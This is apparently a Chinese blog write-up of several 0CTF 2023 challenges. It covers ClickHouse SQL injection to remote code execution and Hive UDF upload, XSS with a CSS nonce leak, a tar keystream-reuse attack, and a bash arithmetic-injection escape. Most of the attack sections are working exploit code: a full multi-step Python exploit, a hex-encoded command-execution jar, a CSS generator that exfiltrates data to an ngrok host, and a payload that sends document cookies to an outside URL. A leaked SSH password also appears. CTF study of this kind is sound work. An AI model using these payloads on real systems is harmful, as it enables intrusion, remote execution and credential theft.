本文最后更新于 408 天前,其中的信息可能已经有所发展或是发生改变。
没时间写,强网杯打完再不写就真不想写了,连夜先写点儿
Web
OLAPInfra
官方WriteUp
https://github.com/zsxsoft/my-ctf-challenges/tree/master/0ctf2023/olapinfra
- 启动docker之前,先把hive和clickhouse的
entrypoint.sh
的非法字符删了,不然会报exec /start.sh: no such file or directory
sed -i "s/\r//g" entrypoint.sh
- 入口只有一个,web容器的8080端口
<?php
error_reporting(E_ALL ^ E_DEPRECATED);
require __DIR__ . '/../vendor/autoload.php';
if (!isset($_GET['query'])) {
show_source(__FILE__);
exit;
}
$config = [
'host' => 'clickhouse',
'port' => '8123',
'username' => 'default',
'password' => ''
];
$db = new ClickHouseDB\Client($config);
$db->database('default');
$db->setTimeout(1.5);
$db->setTimeout(10);
$db->setConnectTimeOut(5);
$db->ping(true);
$statement = $db->select('SELECT * FROM u_data WHERE ' . $_GET['query'] . ' LIMIT 10');
echo (json_encode($statement->rows()));
// Err 'Uncaught ClickHouseDB\Exception\DatabaseException: connect to hive metastore: thrift' or
// Err 'NoSuchObjectException(message=hive.default.u_data table not found)',
// please wait for >= 1min, hive is not initialized.
- 很明显通过sql注入达到RCE的结果,执行
/readflag
,由clickhouse-jdbc-bridge官方文档可以发现允许执行javascript代码
-- scripting
select * from jdbc('script', '[1,2,3]')
select * from jdbc('script', 'js', '[1,2,3]')
select * from jdbc('script', 'scripts/one-two-three.js')
1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'java.lang.Runtime.getRuntime().exec("id")')
- 回显
1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/readflag"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')
- 此时,成功RCE读取第一个部分flag,接下来要通过
Clickhoust
攻击Hive
;由Hive官方文档得知,可以通过上传jar包以创建新的函数
Create Function
Version information
As of Hive 0.13.0 (HIVE-6047).
CREATE FUNCTION [db_name.]function_name AS class_name
[USING JAR|FILE|ARCHIVE 'file_uri' [, JAR|FILE|ARCHIVE 'file_uri'] ];
This statement lets you create a function that is implemented by the class_name. Jars, files, or archives which need to be added to the environment can be specified with the USING clause; when the function is referenced for the first time by a Hive session, these resources will be added to the environment as if ADD JAR/FILE had been issued. If Hive is not in local mode, then the resource location must be a non-local URI such as an HDFS location.
The function will be added to the database specified, or to the current database at the time that the function was created. The function can be referenced by fully qualifying the function name (db_name.function_name), or can be referenced without qualification if the function is in the current database.
- Exec.java
package udf;
import org.apache.hadoop.hive.ql.exec.UDF;
import org.apache.hadoop.io.Text;
import java.io.*;
import java.lang.*;
public final class Exec extends UDF {
public Text evaluate(final Text s) {
if (s == null) { return null; }
try
{
String result = "";
String command = s.toString();
Process p = Runtime.getRuntime().exec(command);
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String inputLine;
while ((inputLine = in.readLine()) != null) {
result += inputLine + "\n";
}
in.close();
return new Text(result);
} catch (IOException e) {
return new Text(e.toString());
}
}
}
- 上传jar
jdbc('jdbc:clickhouse://127.0.0.1:8123', 'CREATE TABLE hdfs_test (name String) ENGINE=HDFS(\'hdfs://namenode:8020/a.jar\', \'Native\');')
jdbc('jdbc:clickhouse://127.0.0.1:8123', 'INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insert=TRUE VALUES (unhex(\'504b0304140008080800908a1457000000000000000000000000090004004d4554412d494e462ffeca00000300504b0708000000000200000000000000504b0304140008080800908a1457000000000000000000000000140000004d4554412d494e462f4d414e49464553542e4d46f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5722e4a4d2c494dd175aa040958e819c41b19182968f8172526e7a42a38e71715e417259600d56bf272f1720100504b07084dcd370f4400000045000000504b03040a0000080000e0891457000000000000000000000000040000007564662f504b03041400080808008f8a14570000000000000000000000000e0000007564662f457865632e636c6173738554db521341103d13929db02c04c235de50144820b082281810919ba209580429f3e6920c6135ecc6b04bf147bee24b62992a1fb5ca6ff01bfc024bec59ae01d4247576a64f9fee9e9ede7cfffdf90b8031aca8e8447f10511561c4540c6050429c63886358858ebb2a384654281895708f634c85867e09f78378209f31c98c734cc8280f39122ada10e398e4986250a64ccb74a619eaa2b17506ff9c9d130ca1a4698965777b4394d68c8d02598262d728b88643cb8968d22ee575a36864b784be65e46cbba89bb6be26f69cc9d83f3886c6b46364dfa58ca217d5ab6182e311c7b477a604839ab6dd52562c9a3269fdc29ec80ebf35760d0d5d8830d0711e6386e3898659cc6998c702438774904966ddcd4d5112b95561e4448921724c2c5945d7493b25616c1f729450c3229ecab0cf242c69788e19864e4f5230acbc4efea6959f75cd020934bc409281a91a52b290c85f4f29a32d33b49ee45e59d8cb8aa263da1675d1cd6deaf2500c3d17236c99bb427f5fd00539e8afe617199acf97c3d0726a7a59b2b3626787c23af631dd168d25cf8b266b54abaee598dbd45d352f9c934d7b8deec84c42bff0aaed8f5e8c7a5670540a099a28ea997e534b8f23d75e04b976452f25e41cb69e528737e65983c4e7e468d2dc1ac5a2b0720c43ffa9ace61a2969205bb077bc035fa25bc7083ae8a5931f1f981c3ac22bb4bb4e4f9a3f04062a601f69c1709550f18c9cf09ae7225d7f224016c01afc8600db0ffb528365d42d7f827fa88c40c25f8592a9826722fe328215d457a026029140190d9984f215dd5568990a1ae365344514827088a08ce6d487831fd2ada58a70265e41eb7eca5b95d12e37945dc11b18f476fbbcda86d140584f568db0114df4ed440871b4609cfe0bd2e4f91aeda4e8c0063137c87b147ee500bd5038ba396e72dcf27e3d1cb7815fe8a3dd0185f21dd2601c77286fafd7aebe3f504b07083d09d2e8ba020000b9040000504b03041400080808008a8a14570000000000000000000000000d0000007564662f457865632e6a6176617d51c14ec3300cbdf72bcc4e2993f203532f88214d42020db87131a9db06d224a4c93684faef245dd795219143e43cbff7ecd816c507d604a1ac56996cad711e8cab395a140df1064b632c6fe48ef8a7e27420c15f6eeffea14ac39fe9e027c63bee3081d7bf1185ba4e186436bc2929a0921a1508855d07eb5806a209e9b283580ebe33809197cc8176a8027a6247d58075f940039015b00e8a0274502a82e0c807a787e70afa81e3dd170cc15192ce937752d791dc05e5a180c562759913a66d519731d9716f8e20cbcfb4476704c5fe6d646c83f6b2255e931f43960ff363a3cb4c7713aa8a1c955bc2921c481df59af617384bd046dbe06365c276446d2a3183599ee77f3a97297f2f359d33fb462a02c6a6542c2a358f16657a451bb89a6638a9d21947b42cceb6b084c5ab9e4dac9fa2e82994e9683ea8d346e287d2eed8d17124f420d08b06d8e6617d1064bd341a68dec4a59c66db38996459bafa1f504b0708f7e1f46d60010000e0020000504b01021400140008080800908a14570000000002000000000000000900040000000000000000000000000000004d4554412d494e462ffeca0000504b01021400140008080800908a14574dcd370f440000004500000014000000000000000000000000003d0000004d4554412d494e462f4d414e49464553542e4d46504b01020a000a0000080000e08914570000000000000000000000000400000000000000000000000000c30000007564662f504b010214001400080808008f8a14573d09d2e8ba020000b90400000e00000000000000000000000000e50000007564662f457865632e636c617373504b010214001400080808008a8a1457f7e1f46d60010000e00200000d00000000000000000000000000db0300007564662f457865632e6a617661504b0506000000000500050026010000760500000000\'))')
- 因为第二个部分的flag在hive的机器里,由于clickhouse并不支持
Thrift
协议,所以出题人写了一个简易的hive客户端,通过命令执行连接hive;上传时分块上传,后进行拼接
package main
import (
"context"
"github.com/beltran/gohive"
"log"
"os"
)
func main() {
conf := gohive.NewConnectConfiguration()
conf.Username = "root" // username maybe empty
connection, errConn := gohive.Connect("hive", 10000, "NONE", conf)
if errConn != nil {
log.Fatalln(errConn)
}
defer connection.Close()
cursor := connection.Cursor()
ctx := context.Background()
cursor.Exec(ctx, os.Args[1])
if cursor.Err != nil {
log.Fatalln(cursor.Err)
}
defer cursor.Close()
var s string
for cursor.HasMore(ctx) {
cursor.FetchOne(ctx, &s)
if cursor.Err != nil {
log.Fatalln(cursor.Err)
}
log.Println(s)
}
}
#!/bin/bash
# build in golang:1.21.3-bullseye
go build -a -gcflags=all="-l -B -wb=false" -ldflags "-s -w"
upx --brute --best clickhouse-to-hive
- 通过这个客户端,使用上传的jar包,执行
readflag
create function default.v as 'udf.Exec' using jar 'hdfs:///a.jar'
select default.v('/readflag')\" 2>&1
import requests
import base64
import re
import json
import sys
def tohex(s):
return ''.join("{:02x}".format(ord(c)) for c in s)
def ch_jdbc_sql(s):
return "jdbc('jdbc:clickhouse://127.0.0.1:8123', '" + s.replace("'", "\\\'") + "')"
def query(s):
a = requests.get(sys.argv[1], params={
"query": "1=0 union all select results, '2', '3', '4' from " + s
})
text = a.text
try:
return json.loads(text)[0]['userid']
except:
return a.text
def rce_in_clickhouse(c):
sql = "jdbc('script:', 'var a=new java.lang.ProcessBuilder(\"bash\",\"-c\",\"{{echo,{}}}|{{base64,-d}}|{{bash,-i}}\"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){{sb.append(String.fromCharCode(d))}};c.close();sb.toString()')".format(base64.b64encode(c.encode('utf-8')).decode('utf-8'))
return query(sql)
def step1():
print('====== STEP 1: RCE in clickhouse-jdbc-driver ======')
flag = rce_in_clickhouse('/readflag')
print(f'FLAG1: {flag}')
def step2():
print('====== STEP 2: Upload hive UDF to HDFS by clickhouse ======')
udf = open('udf.jar', 'rb').read().hex()
sql1 = ch_jdbc_sql("CREATE TABLE hdfs_test (name String) ENGINE=HDFS('hdfs://namenode:8020/a.jar', 'Native');")
sql2 = ch_jdbc_sql("INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insert=TRUE VALUES (unhex('{}'))".format(udf))
query(sql1)
query(sql2)
def step3():
print('====== STEP 3: Upload hive client to clickhouse ======')
ch_to_hive = open('./clickhouse-to-hive/clickhouse-to-hive', 'rb').read()
ch_to_hive_parts = [ch_to_hive[i:i+4096] for i in range(0, len(ch_to_hive), 4096)]
for i, r in enumerate(ch_to_hive_parts):
# Cannot direct append because script will be executed twice
s = base64.b64encode(r).decode('ascii')
sql3 = "jdbc('script:', 'var fos=Java.type(\"java.io.FileOutputStream\");var f=new fos(\"/tmp/ttt{}\");f.write(java.util.Base64.decoder.decode(\"{}\"));f.close();1')".format(str(i), s)
query(sql3)
sql4 = "jdbc('script:', 'var File=Java.type(\"java.io.File\");var fos=Java.type(\"java.io.FileOutputStream\");var fis=Java.type(\"java.io.FileInputStream\");var f=new fos(\"/tmp/ch-to-hive\");for(var i=0;i<{};i++){{var ff=new File(\"/tmp/ttt\"+i.toString());var a=new Array(ff.length()+1).join(\"1\").getBytes();var fi=new fis(ff);fi.read(a);fi.close();f.write(a);}}f.close();')".format(str(len(ch_to_hive_parts)))
query(sql4)
rce_in_clickhouse('chmod +x /tmp/ch-to-hive && rm -rf /tmp/ttt*')
def step4():
print('====== STEP 4: RCE in hive ======')
hivesql1 = "/tmp/ch-to-hive \"create function default.v as 'udf.Exec' using jar 'hdfs:///a.jar'\""
hivesql2 = "/tmp/ch-to-hive \"select default.v('/readflag')\" 2>&1"
rce_in_clickhouse(hivesql1)
print('FLAG2: ' + rce_in_clickhouse(hivesql2))
rce_in_clickhouse('rm -rf /tmp/ch-to-hive')
step1()
step2()
step3()
step4()
New Diary
相关WriteUp
https://github.com/salvatore-abello/CTF-Writeups/tree/main/0ctf%20-%202023/newdiary
https://blog.huli.tw/2023/12/11/en/0ctf-2023-writeup/
- 先观察一下有哪些路由,
/
单纯一个跳转,如果session
存在,渲染index.html并且显示自己的note
app.all("/", (req, res) => {
if (!req.session.username) {
return res.redirect("/login");
} else {
return res.render("index", {
username: req.session.username,
notes: notes.get(req.session.username) || [],
});
}
});
GET /login
,渲染login.html
app.get("/login", (req, res) => {
if (req.session.username) {
return res.redirect("/");
}
return res.render("login");
});
POST /login
,登录加注册
app.post("/login", (req, res) => {
if (req.session.username) {
return res.redirect("/");
}
const { username, password } = req.body;
if (
username.length < 4 ||
username.length > 10 ||
typeof username !== "string" ||
password.length < 6 ||
typeof password !== "string"
) {
return res.render("login", { msg: "invalid data" });
}
if (users.has(username)) {
if (users.get(username) === sha256(password)) {
req.session.username = username;
return res.redirect("/");
} else {
return res.render("login", { msg: "Invalid Password" });
}
} else {
users.set(username, sha256(password));
req.session.username = username;
return res.redirect("/");
}
});
/write
,接收title和content两个参数,并且限制title.length<30
,content.length<256
app.post("/write", (req, res) => {
if (!req.session.username) {
return res.redirect("/");
}
const username = req.session.username;
const { title, content } = req.body;
assert(title && typeof title === "string" && title.length < 30);
assert(content && typeof content === "string" && content.length < 256);
const user_notes = notes.get(username) || [];
user_notes.push({
title,
content,
username,
});
notes.set(req.session.username, user_notes);
return res.redirect("/");
});
/read
,渲染read.html,并且页面内包含nonce
app.get("/read", (req, res) => {
if (!req.session.username) {
return res.redirect("/");
}
return res.render("read", { nonce: res.nonce });
});
/read/:id
,返回对应用户的对应IDnote
app.get("/read/:id", (req, res) => {
if (!req.session.username) {
return res.redirect("/");
}
const { id } = req.params;
if (!/^\d+$/.test(id)) {
return res.json({ status: 401, message: "Invalid parameter" });
}
const user_notes = notes.get(req.session.username);
const found = user_notes && user_notes[id];
if (found) {
return res.json({ title: found.title, content: found.content });
} else {
return res.json({ title: "404 not found", content: "no such note" });
}
});
/share_diary/:id
,将note
存入share_notes
,重定向至/share
app.get("/share_diary/:id", (req, res) => {
if (!req.session.username) {
return res.redirect("/");
}
const tmp = share_notes.get(req.session.username) || [];
const { id } = req.params;
if (!/^\d+$/.test(id)) {
return res.json({ status: 401, message: "Invalid parameter" });
}
const user_notes = notes.get(req.session.username);
const found = user_notes && user_notes[id];
if (found) {
tmp.push(found);
share_notes.set(req.session.username, tmp);
return res.redirect("/share");
} else {
return res.json({ title: "404 not found", content: "no such note" });
}
});
/share
,显示用户share的note
app.all("/share", (req, res) => {
if (!req.session.username) {
return res.redirect("/login");
} else {
return res.render("share", {
notes: share_notes.get(req.session.username) || [],
});
}
});
/share/read
,渲染read_share.html
app.get("/share/read", (req, res) => {
return res.render("read_share", { nonce: res.nonce });
});
/share/read/:id
,查询任意存在用户已共享的对应note,返回json
数据
app.get("/share/read/:id", (req, res) => {
const { id } = req.params;
const username = req.query.username;
let found;
if (!/^\d+$/.test(id)) {
return res.json({ status: 401, message: "Invalid parameter" });
}
try {
if (username !== undefined) {
found = share_notes.get(username);
if (found) {
return res.json({
title: found[id].title,
content: found[id].content,
username: found[id].username,
});
}
} else if (req.session.username) {
found = share_notes.get(req.session.username);
if (found) {
return res.json({
title: found[id].title,
content: found[id].content,
username: found[id].username,
});
}
}
} catch {
return res.json({ title: "404 not found", content: "no such note" });
}
return res.json({ title: "404 not found", content: "no such note" });
});
/logout
app.all("/logout", (req, res) => {
req.session.destroy();
return res.redirect("/");
});
/report
,触发bot去访问你给页面,限制了频率30秒
app.get("/report", (req, res) => {
if (!req.session.username) {
return res.redirect("/login");
}
const id = req.query.id;
const username = req.query.username;
if (typeof id === "string" && /^\d+$/.test(id)) {
try {
if (
report.has(req.session.username) &&
report.get(req.session.username) + 30 > now()
) {
return res.json({ error: "too fast" });
}
report.set(req.session.username, now());
visit(id, username);
return res.json({ msg: "visited" });
} catch (e) {
return res.status(500).json({ error: "failed" });
}
}
res.status(400).json({ error: "bad url" });
});
visit()
async function visit(id, username) {
const browser = await puppeteer.launch({
args: ["--no-sandbox", "--headless"],
executablePath: "/usr/bin/google-chrome",
});
try {
let page = await browser.newPage();
await page.goto(`http://localhost/login`);
await page.waitForSelector("#username");
await page.focus("#username");
await page.keyboard.type(random_bytes(10), { delay: 10 });
await page.waitForSelector("#password");
await page.focus("#password");
await page.keyboard.type(random_bytes(20), { delay: 10 });
await new Promise((resolve) => setTimeout(resolve, 300));
await page.click("#submit");
await new Promise((resolve) => setTimeout(resolve, 300));
page.setCookie({
name: "FLAG",
value: flag,
domain: "localhost",
path: "/",
httpOnly: false,
sameSite: "Strict",
});
await page.goto(
`http://localhost/share/read#id=${id}&username=${username}`,
{ timeout: 5000 }
);
await new Promise((resolve) => setTimeout(resolve, 30000));
await page.close();
await browser.close();
} catch (e) {
console.log(e);
await browser.close();
}
}
- 目前一个比较明显大致的基本操作流程成型
- 创建note
- 共享note
- bot触发,xss获取flag
- xss的页面主要涉及到
share_read.js
这个文件
load = () => {
document.getElementById("title").innerHTML = ""
document.getElementById("content").innerHTML = ""
const param = new URLSearchParams(location.hash.slice(1));
const id = param.get('id');
let username = param.get('username');
if (id && /^[0-9a-f]+$/.test(id)) {
if (username === null) {
fetch(`/share/read/${id}`).then(data => data.json()).then(data => {
const title = document.createElement('p');
title.innerText = data.title;
document.getElementById("title").appendChild(title);
const content = document.createElement('p');
content.innerHTML = data.content;
document.getElementById("content").appendChild(content);
})
} else {
fetch(`/share/read/${id}?username=${username}`).then(data => data.json()).then(data => {
const title = document.createElement('p');
title.innerText = data.title;
document.getElementById("title").appendChild(title);
const content = document.createElement('p');
content.innerHTML = data.content;
document.getElementById("content").appendChild(content);
})
}
document.getElementById("report").href = `/report?id=${id}&username=${username}`;
}
window.removeEventListener('hashchange', load);
}
load();
window.addEventListener('hashchange', load);
- 改代码中添加了
hashchange
的监听器,那么就可以在不重新加载页面的情况下请求多个note
,并且不改变nonce
;但此处我们只能修改一次hash,然后hashchange_EventListener
将会被删除;在此处代码中,对content
赋值时,使用了innerHTML
赋值,则可以插入我们想要的html代码- 实际上,在提交页面给bot访问时,只能访问一个页面,我们无法修改其hash,则需要第一次先使bot重定向至我们自建的页面,以修改hash
- 但是,在该处页面的html中限制了
script-src
<meta http-equiv="Content-Security-Policy"
content="script-src 'nonce-<%= nonce %>'; frame-src 'none'; object-src 'none'; base-uri 'self'; style-src 'unsafe-inline' https://unpkg.com">
- 因为这个代码的存在,致使只能执行nonce正确的javascript;同时,该规则允许了来自
https://unpkg.com
源的css(看到这就基本猜到要把恶意css传到unpkg.com上泄露nonce以执行js了)- 注意,此处css能够实现泄露nonce因其位于页面
meta
标签内 - 对css窃取标签内容的文章的介绍
- 注意,此处css能够实现泄露nonce因其位于页面
- 则目前的操作流程,note 0 使bot跳转至自己的页面,以使二次改变hash
<meta http-equiv="refresh" content="0.0;url=https://example.com">
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<script>
const sleep = (milliseconds) => new Promise(resolve => setTimeout(resolve, milliseconds));
async function run(){
bot_window = window.open("http://localhost/share/read#id=1&username={{USERNAME}}"); // Exploit 1, leak nonce
await sleep(7000);
bot_window.location.href = "http://localhost/share/read#id=2&username={{USERNAME}}"; // Exploit 2, leak cookie
await sleep(100);
console.log("O");
}
run();
</script>
</body>
</html>
- 随后跳转至note 1,触发
css leak
(前提将css上传至https://unpkg.com
<link rel="stylesheet" href="https://unpkg.com/xxxxx.css"><input />
import itertools
charset = "abcdefghijklmnopqrstuvwxyz0123456789"
perms = list(map("".join, itertools.product(charset, repeat=3)))
with open("leak.css", "w") as f:
for i, x in enumerate(perms):
f.write(
f""":has(script[nonce*="{x}"]){{--tosend-{x}: url(https://25de-37-160-34-111.ngrok-free.app/?x={x});}}""")
data = ""
print("loading")
for x in perms:
data += f"var(--tosend-{x}, none),"
print("done")
print("writing")
f.write(("""
input{
background: %s
}
""" % data[:-1]))
- 通过收到的leak请求判断nonce的代码
def retrieveNonce(nonce_substr=nonce_substr, force=False):
# find the beginning of the nonce (there is no match for start)
new_substr = list(nonce_substr)
if (len(new_substr) != 30 and not force):
print(f"different length of new_substr [{len(new_substr)}] - aborting")
return 0
backup = []
nonce = ''
remove_i = 0
for i in range(len(new_substr)):
start_i = new_substr[i][0:2]
left = 0
for j in range(len(new_substr)):
end_j = new_substr[j][-2:]
if i != j:
if start_i == end_j:
left = 1
break
if left == 0:
# beginning
remove_i = i
nonce = new_substr[i]
break
if (len(nonce) == 0):
print("no beginning - aborting")
return 0
while (len(nonce) < 32):
new_substr = new_substr[0:remove_i] + new_substr[remove_i+1:]
# print("new substr: " + str(new_substr))
found = []
for i in range(len(new_substr)):
start_i = new_substr[i][0:2]
if (nonce[-2:] == start_i):
# print("found: " + start_i)
found += [i]
if (len(found) == 0):
# start over from latest backup
if (len(backup) > 0):
nonce = backup[-1][0]
found = backup[-1][1]
new_substr = backup[-1][2]
backup = backup[:-1]
else:
print("no backup - aborting")
break
if (len(found) > 0):
if (len(found) > 1):
print("found more than one: " + str(found))
backup += [[nonce, found[1:], new_substr]]
remove_i = found[0]
nonce += new_substr[remove_i][-1]
# input("nonce: " + nonce)
return nonce
- 此时获取到nonce,然后泄露cookie,note 2
<iframe name=asd srcdoc="<script nonce=nonce>top.location='https://example.com/flag?flag='+encodeURI(document['cookie'])</script>"/>
- 获取到flag
挺有趣的题目,但是其中有些重要的点都没有亲自去尝试,前端欠缺的东西不少,只能说是理解了,实操还是差点儿,这个题解,只能算是对其他大师傅的一个细读,后续再慢慢实验
Misc
说句题外话,这misc里好多shellcode,比赛的时候都是r3的re✌在做,看不懂二进制的世界
ctar
出题人
https://github.com/Septyem/My-Public-CTF-Challenges/blob/master/0ctf-tctf-2023/ctar/
- 看着预期解,是要通过构造特殊的tar包使python解压时报错,以直接下载flag,不懂,直接偷wp
from pwn import *
import struct
from hashlib import sha256
def dopow(c):
chal = c.recvline()
post = chal[12:28]
tar = chal[33:-1].decode('latin-1')
c.recvuntil(':')
found = iters.bruteforce(lambda x:sha256(x.encode('latin-1')+post).hexdigest()==tar, string.ascii_letters+string.digits, 4)
c.sendline(found)
context.log_level='debug'
#c = remote("127.0.0.1", 10010)
c = remote("202.120.7.12", 30001)
dopow(c)
omode = b'0000644\x00'
oname = b'51774a47'
tmode = b'\x80\x00\x00\x00\x80\x00\x01\xed'
with open("a.tar", 'rb') as f:
pt = f.read()
cksum1 = 256 + sum(struct.unpack_from("148B8x356B", pt[0x400:]))
ocksum1 = oct(cksum1)[2:]
assert len(ocksum1) == 5
cksum2 = 256 + sum(struct.unpack_from("148B8x356B", pt[0xc00:]))
ocksum2 = oct(cksum2)[2:]
assert len(ocksum2) == 5
with open("a.ctar", 'rb') as f:
ct = f.read()
ct = list(ct)
c.sendlineafter('> ', '0')
c.recvuntil('[OK] ')
tname = c.recv(8)
assert len(tname)==8
for i in range(8):
ct[8+0xc00+i] ^= oname[i]^tname[i]
cksum2 += tname[i]-oname[i]
for i in range(8):
ct[8+0x464+i] ^= omode[i]^tmode[i]
cksum1 += tmode[i]-omode[i]
tcksum1 = oct(cksum1)[2:]
assert len(tcksum1) == 5
tcksum2 = oct(cksum2)[2:]
assert len(tcksum2) == 5
for i in range(5):
ct[8+0x495+i] ^= ord(ocksum1[i])^ord(tcksum1[i])
for i in range(5):
ct[8+0xc95+i] ^= ord(ocksum2[i])^ord(tcksum2[i])
cont = bytes(ct)
c.sendlineafter('> ', '2')
c.sendlineafter(': ', str(len(cont)))
c.sendlineafter(': ', cont.hex())
c.sendlineafter('> ', '4')
c.recvuntil('size: ')
sz = int(c.recvline())
ctar = c.recvline()
assert len(ctar) == sz*2+1
t = bytes.fromhex(ctar.strip().decode('latin-1'))
t = list(t)
t[8] ^= 1
c.sendlineafter('> ', '2')
c.sendlineafter(': ', str(len(t)))
c.sendlineafter(': ', bytes(t).hex())
c.recvuntil("tar file\n")
resp = c.recvline()
t = list(bytes.fromhex(resp.strip().decode('latin-1')))
t[0] ^= 1
with open("ans.tar", 'wb') as f:
f.write(bytes(t))
c.close()
- r3的师傅们的题解
ChaCha20为流密码,当nonce和key保持不变时,生成的密钥流一直不变
密钥流 ^ 明文 = 密文
使用两对明文密文则可以计算出密钥流
from Crypto.Cipher import ChaCha20 from Crypto.Util.number import * import os key = os.urandom(32) nonce = os.urandom(8) cipher = ChaCha20.new(nonce=nonce, key=key) msg1 = b'mytest_msg' c1 = cipher.encrypt(msg1) cipher = ChaCha20.new(nonce=nonce, key=key) msg2 = b'flag{test}' c2 = cipher.encrypt(msg2) res = b'' for i in range(10): key_byte = c1[i] ^ msg1[i] res += long_to_bytes(key_byte ^ c2[i]) print(res) #b'flag{test}'
exp.py
from pwncli import * from ctypes import * update = False context(os='linux', arch='amd64', log_level='debug', terminal=['gnome-terminal','-x', 'sh', '-c']) ip_port='chall.ctf.0ops.sjtu.cn 30001' ip, port=ip_port.split(' ') io = remote(ip,int(port)) rl = lambda a=False : io.recvline(a) ru = lambda a,b=True : io.recvuntil(a,b) r = lambda x : io.recvn(x) ra = lambda x : io.recvall(x) s = lambda x : io.send(x) sl = lambda x : io.sendline(x) sa = lambda a,b : io.sendafter(a,b) sla = lambda a,b : io.sendlineafter(a,b) ia = lambda : io.interactive() db = lambda text=None : gdb.attach(io, text) lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) uu32 = lambda data : u32(data.ljust(4, b'\x00')) uu64 = lambda data : u64(data.ljust(8, b'\x00')) nonce = '' def add_secret(size, hex_file): sla('> ','1') sla('size: ',str(size)) sla('file(hex): ', hex_file) pass def upload_tar(file): content = file sla('> ','2') sla('size: ',str(len(content))) sla('file(hex): ', nonce.encode('latin1').hex() + content.hex()) pass def read_secrets(): sla('> ','3') # do nothing pass def download_tar() -> bytes: sla('> ','4') rl() return rl() def add_flag() -> str: sla('> ','0') ru('[OK] ') return r(8).decode() def proof_of_work(): import hashlib import itertools import string ru('sha256(XXXX+') suffix = r(16).decode() ru(') == ') target_hash = r(64).decode() for chars in itertools.product(string.ascii_letters + string.digits, repeat=4): test_string = ''.join(chars) + suffix test_hash = hashlib.sha256(test_string.encode()).hexdigest() if test_hash == target_hash: solution = ''.join(chars) break sla('Give me XXXX:',solution) proof_of_work() # leak leak = bytes.fromhex(download_tar().decode()).decode('latin1') nonce = leak[:8] enc = leak[8:] assert len(nonce) == 8 assert len(enc) == 10240 flag_file = add_flag() print('\033[1;31;40m The nonce is %s \033[0m' % nonce.encode('latin1').hex()) print('\033[1;31;40m The flag file is %s \033[0m' % flag_file) # generate import os mkdir_p('./' + flag_file) os.system('tar -cf a.tar ' + flag_file) with open('a.tar', 'rb') as f: upload_tar(xor(f.read(),enc.encode('latin1'))) # upload_tar(f.read()) leak = bytes.fromhex(download_tar().decode()).decode('latin1') flag = leak[8:] nonce = leak[:8] upload_tar(b'\x00'*0x2800) rl() rl() enc = rl() print('\033[1;31;40m The length of enc is %d \033[0m' % len(enc)) with open('flag.tar', 'wb') as w: w.write(xor(flag,bytes.fromhex(enc.decode('latin1')))) ia()
mathexam
我觉得很好玩的题目,也算是点儿小技巧(可能吧
- flag1
The math exam starts now. Participate with integrity and never cheat.
Someone has stolen the exam paper, and definitely he got full marks.
Fortunately, he didn't find the flag.
#!/bin/bash
echo "You are now in the math examination hall."
echo "First, please read exam integrity statement:"
echo ""
promisetext="I promise to play fairly and not to cheat. In case of violation, I voluntarily accept punishment"
echo "$promisetext"
echo ""
echo "Now, write down the exam integrity statement here:"
read userinput
if [ "$userinput" = "$promisetext" ]
then
echo "All right"
else
echo "Error"
exit
fi
echo ""
echo "Exam starts"
echo "(notice: numbers in dec, oct or hex format are all accepted)"
echo ""
correctcount=0
for i in {1..100}
do
echo "Problem $i of 100:"
echo "$i + $i = ?"
ans=$(($i+$i))
read line
if [[ "$line" -eq "$ans" ]]
then
correctcount="$(($correctcount+1))"
fi
echo ""
done
echo "Exam finishes"
echo "You score is: $correctcount"
exit
flag1
- ByteCTF2022 bash逃逸
[[ "$line" -eq "$ans" ]]
因为这个东西
a[$(sh 1>&2)]
- flag2,部分靶机的信息
cd /etc
ls
resolv.conf
cat resolv.conf
search sugon.server.sjtunic.org
nameserver 127.0.0.11
options ndots:0
ls -al
total 52
drwxr-xr-x 1 0 0 4096 Dec 10 00:11 .
drwxr-xr-x 1 0 0 4096 Dec 10 00:11 ..
-rw-r--r-- 1 0 0 12288 Mar 17 2023 .connect.sh.swp
drwxr-xr-x 1 0 0 4096 Dec 10 00:11 bin
drwxr-xr-x 1 0 0 4096 Dec 10 05:47 etc
-rw-rw-r-- 1 0 0 359 Dec 10 00:10 flag1
drwxr-xr-x 3 0 0 4096 Dec 9 18:44 lib
drwxr-xr-x 2 0 0 4096 Dec 9 18:44 lib64
-rwxrwxr-x 1 0 0 836 Mar 17 2023 server
cat .connect.sh.swp
U3210#"! Utpad�����sshpass -p x5kdkwjr8exi2bf70y8g80bggd2nuepf ssh ctf@second#!/bin/bashect.sh
bash-5.1$ busybox
busybox
BusyBox v1.30.1 (Ubuntu 1:1.30.1-7ubuntu3) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
Usage: busybox [function [arguments]...]
or: busybox --list[-full]
or: busybox --install [-s] [DIR]
or: function [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. The shell in this build
is configured to run built-in utilities without $PATH search.
You don't need to install a link to busybox for each utility.
To run external program, use full path (/sbin/ip instead of ip).
Currently defined functions:
[, [[, acpid, adjtimex, ar, arch, arp, arping, ash, awk, basename, bc,
blkdiscard, blockdev, brctl, bunzip2, busybox, bzcat, bzip2, cal, cat,
chgrp, chmod, chown, chpasswd, chroot, chvt, clear, cmp, cp, cpio,
crond, crontab, cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem,
df, diff, dirname, dmesg, dnsdomainname, dos2unix, dpkg, dpkg-deb, du,
dumpkmap, dumpleases, echo, ed, egrep, env, expand, expr, factor,
fallocate, false, fatattr, fdisk, fgrep, find, fold, free, freeramdisk,
fsfreeze, fstrim, ftpget, ftpput, getopt, getty, grep, groups, gunzip,
gzip, halt, head, hexdump, hostid, hostname, httpd, hwclock, i2cdetect,
